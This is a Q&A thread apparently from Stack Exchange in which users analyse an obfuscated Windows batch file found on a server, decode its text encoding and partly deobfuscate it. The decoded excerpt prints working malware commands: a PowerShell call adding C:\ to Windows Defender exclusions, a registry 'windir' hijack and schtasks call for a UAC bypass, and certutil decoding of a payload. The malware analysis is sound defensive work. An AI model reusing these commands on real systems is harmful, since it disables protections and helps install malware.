# How to decode contents of a batch file with chinese characters

Tags: batch-file, cmd.exe

I have a batch file with a load of Chinese characters inside as below. When I run it, the file gets deleted. Any idea how to decode what the content is and what it is doing?

[image]

Some of the text:

```
挦獬਍╀啰求捉縺㤸㠬┳倥䉕楌㩣㕾ㄬ䌥潈⁞景╞畐求䍉縺㘴ㄬ┶⁦ഠ帊瀥䉕䥬㩃ㅾⰴ┱䱞瀥䉕楬㩃㕾ⰵ㜱帥瀥扵䥬㩣㑾ㄬ‥ഠ匊瑅删㵞杊╞啰䱂捉縺㌱ㄬ帥瑧塇╺啰䱂捉縺ⰴ┱╷啰䱂捉縺ㄱㄬ帥浨瀥䉕䥌㩣ㅾⰰ┱卞䡞幉⁏਍爥縺ⰸ┱╥㩲㑾ㄬ‥慮爥縺㈱ㄬ攥㴠┠㩲ㅾⰰ┱╡㩲㑾ㄬ挥爥縺ㄱㄬ‥╯㩲ㅾⰰ┱爥縺㌱ㄬ┥㩲㡾ㄬ挥╡㩲㑾ㄬ漥⁲爥縺〱ㄬ礥┠㩲ㅾⰲ┱潯爥縺㈱ㄬ㠥㔲ഠ┊㩲㡾ㄬ攥爥縺ⰴ┱┠㩲ㅾㄬ┥㩲㉾ㄬ┥㩲㑾ㄬ┥㩲ㅾⰱ┱爥縺㌱ㄬ┥㩲ㅾⰰ┱㴠┠㩲ㅾⰱ┱爥縺ⰴ┱爥縺ⰴ┱╰㩲㡾ㄬ㨥⼯爥縺ⰱ┱爥縺ⰲ┱爥縺ⰴ┱爥縺ㄱㄬ┥㩲ㅾⰳ┱爥縺〱ㄬ⸥潣爥縺㈱ㄬ⼥爥縺㈱ㄬ漥╯㩲ㅾⰲ┱㈸⼵爥縺〱ㄬ愥爥縺ⰴ┱╣㩲ㅾⰱ┱漭爥縺〱ㄬ春爥縺㌱ㄬ┥㩲㡾ㄬ挥╡㩲㑾ㄬ漥⵲爥縺㈱ㄬ愥敤┭㩲㉾ㄬ渥瀭╹㩲㑾ㄬ┥㩲ㅾⰱ┱湯†਍湞敞爥縺ⰴ┱ㅞ⁞爥縺ⰸ┱䕞爥縺ⰸ┱爥縺㐱ㄬ┥㩲ㅾⰶ┱幯⁎帾啎䱞㈠☾‱ഠ帊爥縺ⰲ┱⁆攥剒剏敌䕖╬㴠‽‰ ഠ倊幯別縺ⰹ┱剅╞㩒ㅾⰴ┱別縺ㄱㄬ帥幅幌⽬⁗㄰⼠灥〠⽞湞別縺㜱ㄬ帥幰振帠帢摁䑞席幍偰干䙅幥幒湅䍞⁥ⵞ䕞別縺ⰶ┱捞╬㩒ㅾⰳ┱別縺㐱ㄬ帥別縺㘱ㄬ漥乞偞╡㩒㑾ㄬ┥㩒ㅾⰵ┱✠䍞尺‧席幦副幃㭅幥別縺ⰶ┱╞㩒㉾ㄬ┥㩒㑾ㄬ‥•ഠ⤊䔠╌㩲㡾ㄬ帥⁥ ഠ爊╥㩲ㅾㄬ‥摡⁤爥縺㔱ㄬ䬥啃䕜癮爥縺ⰲ┱潲╮㩲ㅾⰲ┱湥爥縺ⰴ┱⼠⁦瘯┠㩲㥾ㄬ┥㩲㉾ㄬ渥╤㩲㉾ㄬ爥⼠爥縺ⰴ┱删幅爥縺ⰵ┱╟㩲ㅾⰴ┱幚⼠⁤≞╣㩲ㅾⰲ┱⹤硥⁥振┠㩲㡾ㄬ┥㩲㑾ㄬ愥╲㩲㑾ㄬ‥≜≜⁞┯㩒ㅾⰲ┱別縺ⰲ┱湞尠┢䙾尰㸢乞爥縺㌱ㄬ䰥㈠☾‱簠⁼╞㩒ㅾⰴ┱癞╣㩒ㅾⰵ┱別縺㜱ㄬ┥㩒㡾ㄬ┥㩒㑾ㄬ帥•举爥縺㌱ㄬ帥⁌㸲ㄦ†਍爥縺㐱ㄬ挥爥縺㔱ㄬ吥╁㩲㡾ㄬ欥爥縺ⰸ┱⼠啒⁎⽞湔尠╍㩲ㅾⰶ┱牣
```

It's been a batch file on the server since a 3rd party installed it but they have now gone bust and we're trying to suss out just what is going on

When we run file against it we get:

```
Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
```

It doesn't translate to anything so it may not actually be Chinese but that's due to my ignorance more than anything else

I also tried using `iconv` but the file remains the same

```
iconv -f utf-16 -t utf-8 batchfile.bat > filename_new.txt
```

When I run `strings` on it, I get some readable stuff back

```
certutil -f -decode %pooth% %pooth%
timeout 1
wmic process call create %pooth%
setlocal enableextensions
```

In a hex editor I get the following and whilst it's a little more readable, it still looks like gibberish

[image]

Comment: How do you know this is a batch file? Where did you get it from? Have you tried simply copying the text into an online translation service?

Comment: Yeah, so it's just ASCII text that is being _misdetected_ as UTF-16. Tell your editor to load it as Windows-1252 (or ISO-8859-1, or UTF-8, either will do).

Comment: @user1686 I do that in Notepad++ and Sublime and get a load of question marks instead

Comment: I feel like this should go without saying at this point, but you should never execute any form of script that you do not know what it's supposed to be doing. Especially if you can't even read it.

Comment: "When I run it, the file gets deleted." – Wait, you ran this without knowing what it does? It goes without saying, but you *must* nuke your computer *immediately* and restore it from a known-pristine backup from before the first time you attempted to run this file.

Comment: @JörgWMittag Let's give him the benefit of doubt and suppose he ran it in an isolated virtual machine. Though yeah, kind of naive. This is definitely a virus or spwyware or something equally nasty. Nobody with legitimate purposes obfuscates code like this.

Comment: @JörgWMittag It's even worse than that.  It was apparently set to run on their *server*.

Comment: Yup. @pee2pee probably installed a virus on his or her computer. Now we want for the reply from pee2pee to find out what happened after that.

Comment: I don't think it's a virus. If it really has been there the whole time – it strongly feels like some kind of "insurance" placed by the same 3rd party which originally set up the server. (Backdoor? Time bomb?) Would be very interested in seeing the rest of the script, though (unfortunately I don't think I can OCR it out of the screenshot).

Answer (score 75, accepted):

The file actually has regular ASCII text (or Windows-125x).

It only *looks* a little like UTF-16 containing some Chinese characters, due to some carefully chosen bytes at the very beginning that are able to trick `file` and other charset detection software. (Your screenshot shows that the file begins with FF FE, which is U+FEFF "Byte order mark" in UTF-16LE.)

But I store your example as UTF-16 LE and then ask my text editor to directly interpret those bytes as ASCII or Windows-1252 – not *convert* but literally open the file as cp1252, just like your hex editor did – then I get a regular Windows Cmd batch script:

```
&cls
@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f  
^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%  
SEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O 
%r:~8,1%e%r:~4,1% na%r:~12,1%e = %r:~10,1%a%r:~4,1%c%r:~11,1% o%r:~10,1%%r:~13,1%%r:~8,1%ca%r:~4,1%or %r:~10,1%y %r:~12,1%oo%r:~12,1%825 
%r:~8,1%e%r:~4,1% %r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1% = %r:~11,1%%r:~4,1%%r:~4,1%p%r:~8,1%://%r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1%.co%r:~12,1%/%r:~12,1%oo%r:~12,1%825/%r:~10,1%a%r:~4,1%c%r:~11,1%-o%r:~10,1%f%r:~13,1%%r:~8,1%ca%r:~4,1%or-%r:~12,1%ade-%r:~2,1%n-py%r:~4,1%%r:~11,1%on  
^n^e%r:~4,1%^1^ %r:~8,1%^E%r:~8,1%%r:~14,1%%r:~16,1%o^N >^NU^L 2>&1  
^%r:~2,1%F %eRRORLeVEl% == 0 (  
Po^%R:~9,1%ER^%R:~14,1%%R:~11,1%^E^L^l/W 01 /ep 0^/^n%R:~17,1%^p^/c ^"^Ad^D-^M^pPr^EFe^R^En^Ce ^-^E%R:~6,1%^cl%R:~13,1%%R:~14,1%^%R:~16,1%o^N^Pa%R:~4,1%%R:~15,1% '^C:\' -^f^oRC^E;e^%R:~6,1%^%R:~2,1%%R:~4,1% "  
) EL%r:~8,1%^e (  
re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v %r:~9,1%%r:~2,1%nd%r:~2,1%r /%r:~4,1% RE^%r:~5,1%_%r:~14,1%Z^ /d ^"c%r:~12,1%d.exe /c %r:~8,1%%r:~4,1%ar%r:~4,1% \"\"^ /%R:~12,1%%R:~2,1%^n \"%~F0\">^N%r:~13,1%L 2>&1  || ^%R:~14,1%^vc%R:~15,1%%R:~17,1%%R:~8,1%%R:~4,1%^" >N%r:~13,1%^L 2>&1  
%r:~14,1%c%r:~15,1%TA%r:~8,1%k%r:~8,1% /RUN ^/Tn \M%r:~16,1%cr
```

(Generally, the same bytes can be read in several ways – e.g. the two bytes `2c 31` mean the character "ㄬ" if read as UTF-16 LE, or the characters `,1` if read as ASCII. For example, you see "㩲㉾ㄬ" a lot in your editor because it's actually `r:~2,1`, part of a batch variable expansion.)

This "gibberish" *is* a standard batch file, only somewhat obfuscated – you're looking at lots of `%variable:~start,length%` variable expansions; specific characters from the `%PUBLIC%` variable are reassembled into `%R%`, and then specific characters of *that* variable are used to build up commands. However, for example,

```
re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v
```

clearly means `reg add HKCU\Environment /f /v`.

After building up most of `%R%` by guessing¹, and removing a lot of extraneous `^` escape characters, the result is:

```
&cls
@ECHo off  
cLs  
SEt R=JgigtGXzswbhmuSHIO 
set name = batch obuscator by moom825 
set github = https://github.com/moom825/batch-obfuscator-made-in-python  
net1 sEsSIoN >NUL 2>&1  
iF %eRRORLeVEl% == 0 (  
PowERShELl/W 01 /ep 0/nOp/c "AdD-MpPrEFeREnCe -EXcluSIoNPatH 'C:\' -foRCE;eXit "  
) ELse (  
reg add HKCU\Environment /f /v windir /t REG_SZ /d "cmd.exe /c start \"\" /min \"%~F0\">NuL 2>&1  || SvcHOst" >NuL 2>&1  
ScHTAsks /RUN /Tn \MIcr
```

The first thing it does is *very* suspicious – after checking whether it has Administrator rights using `net1 session`, it adds the whole C:\ drive to Windows Defender's exclusion list. (In the "else" case it probably tries to elevate itself through Task Scheduler, as a way of bypassing UAC.)

Based on the initial snippet, this *might* be able to deobfuscate the rest:

```perl
#!/usr/bin/env perl

my %vars = (
    public => "C:\\Users\\Public",
    r => "JgigtGXzswbhmuSHIO",
);

while (<>) {
    s/%(r|public):~(\d+),(\d+)%/substr($vars{lc $1}, $2, $3)/ige;
    s/\^(.)/$1/g;
    print;
}
```

---

¹ *(I did this on Linux and didn't realize that %PUBLIC% is actually a default variable that exists on all Windows systems...)*

Comment: The [obfuscator iself](https://github.com/moom825/batch-obfuscator-made-in-python/blob/main/batchobfuscator.py) looks obfuscated! I particularly like the fake progress bars however.

Comment: @user1686 %PUBLIC% points to the "All Users" user-profile. IIRC it was introduced with Windows 7/Server 2008. I can't recall seeing it on earlier versions of Windows.

Comment: Yeah, it must have been added during the post-XP user profile rework that happened on Vista/7. (I think the Server releases are paired as Vista≈2008, Win7≈2008R2.)

Answer (score 2):

Judging by the existing text that I can see, I think that this is a CTF challenge by John Hammond (https://ctftime.org/task/17327). I'm pretty sure John made the challenge off of a virus sample, so it is either that you have John's CTF on your server for some reason (harmless), or you have the original sample on your server (possibly harmful).

The virus does a UAC (User Account Control) bypass using the Task Scheduler UAC bypass method, (I'm now basing this off of John's CTF) it then disables all Windows Defender, it then will write a base64-encoded exe to `C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`, then it will use a Windows utility called "certutil" which has a base64-decode function. So in total, this batch file will get admin, disable Defender, then write the payload to startup adding persistence, then decode the payload and run it.

I would highly suggest NOT running this!